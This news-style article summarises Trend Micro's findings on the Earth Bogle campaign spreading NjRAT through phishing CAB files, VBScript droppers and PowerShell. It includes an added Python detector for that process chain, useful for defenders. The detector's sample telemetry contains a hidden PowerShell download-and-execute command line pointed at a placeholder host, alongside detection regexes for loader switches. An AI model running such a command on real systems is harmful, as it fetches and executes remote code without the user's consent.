NjRAT (also known as Bladabindi) is being actively distributed across the Middle East and North Africa in a campaign that uses Middle Eastern geopolitical themes as lures to deliver the remote access trojan. Cybersecurity researchers at Trend Micro uncovered the activity, which has been running since at least mid-2022, and named the threat actor “Earth Bogle.”
According to a report Trend Micro published on Wednesday, the threat actor uses the public file-hosting services files[.]fm and failiem[.]lv to host the malware, while compromised web servers are used to distribute NjRAT.
Phishing emails, typically tailored to the recipient, carry malicious attachments that start the infection chain. The attachment is a Microsoft Cabinet (CAB) archive containing a dropper written in Visual Basic Script (VBScript). The files may also be spread via social networks such as Facebook and Discord, using fake profiles that promote fake news sites.
The CAB files, hosted on cloud storage, are disguised as sensitive voice recordings to trick victims into opening the archive and running the malicious VBScript, which in turn downloads a second malicious VBScript disguised as an image file.
In the second stage, that VBScript retrieves a PowerShell script from a compromised domain; the PowerShell script then loads the RAT payload into memory and executes it.
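The chain above (CAB, VBScript dropper, second VBScript disguised as an image, PowerShell loading the RAT in memory) leaves a recognisable parent/child pattern in process-creation telemetry. The following is an added example, not code from the Trend Micro report or this article: a small detection pass over constructed Sysmon-style process-creation events. The process names, paths, command lines and the stage URL are made up for illustration; the PowerShell switches it looks for (DownloadString, IEX, -EncodedCommand and so on) and the use of `//E:vbscript` to run a script with a non-script extension are generic Windows Script Host and loader behaviour, assumed here rather than taken from the report.

```python
"""Flag script-host -> PowerShell loader chains in process-creation events.

Added example for this article; sample events are constructed, not real data.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Script extensions, plus image extensions: the second-stage VBScript in this
# campaign is described as "disguised as an image", and wscript.exe runs any
# file when the engine is forced with //E:vbscript (assumed WSH behaviour).
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
IMAGE_EXT = re.compile(r"\.(jpg|jpeg|png|gif|bmp)\b", re.IGNORECASE)
ENGINE_SWITCH = re.compile(r"//e:vbscript", re.IGNORECASE)

# Switches and calls common to download-and-run-in-memory PowerShell loaders
# (assumption: generic loader tradecraft, not indicators from the report).
SUSPICIOUS_PS = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string"
    r"|-e(nc|ncodedcommand)?\b|reflection\.assembly",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Return the list of reasons this single event looks like part of the chain."""
    reasons = []
    img = basename(ev.image)
    parent = by_pid.get(ev.parent_pid)
    parent_img = basename(parent.image) if parent else ""
    if img in SCRIPT_HOSTS:
        if SCRIPT_EXT.search(ev.cmdline):
            reasons.append("script host running a script file")
        if IMAGE_EXT.search(ev.cmdline) or ENGINE_SWITCH.search(ev.cmdline):
            reasons.append("script host running a non-script extension (disguised script)")
    if img in POWERSHELL:
        if parent_img in SCRIPT_HOSTS:
            reasons.append("PowerShell spawned by a script host")
        if SUSPICIOUS_PS.search(ev.cmdline):
            reasons.append("PowerShell download/in-memory execution switches")
    return reasons


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk parent links from pid up to the root, returning image basenames."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].parent_pid
    return chain


def triage(events: List[ProcEvent]) -> Dict[int, dict]:
    """Map each flagged pid to its reasons and its full process ancestry."""
    by_pid = {e.pid: e for e in events}
    flagged = {}
    for e in events:
        reasons = score_event(e, by_pid)
        if reasons:
            flagged[e.pid] = {"reasons": reasons, "chain": ancestry(e.pid, by_pid)}
    return flagged


# Constructed sample telemetry (hypothetical paths, pids and URL).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\AppData\Local\Temp\recording.vbs"'),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe //E:vbscript "C:\Users\u\AppData\Local\Temp\photo.jpg"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://stage.example.invalid/s')\""),
    # Benign admin use: launched from explorer, no download/in-memory switches.
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
]

if __name__ == "__main__":
    for pid, info in triage(SAMPLE_EVENTS).items():
        print(pid, " <- ".join(info["chain"]), info["reasons"])
```

The first rule (a script host running any .vbs) fires on legitimate logon scripts too; it is there as enrichment, and the high-confidence signal is the PowerShell event that is both spawned by a script host and carries download or in-memory execution switches, which the ancestry walk then ties back to the original dropper.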
Since its discovery in 2013, NjRAT (also known as Bladabindi) has been used by threat actors to steal confidential data and take over infected machines.
The researchers drew the conclusion that “this scenario illustrates that threat actors would exploit public cloud storage as malware file servers, paired with social engineering approaches appealing to people’s passions, such as regional geopolitical themes as lures.”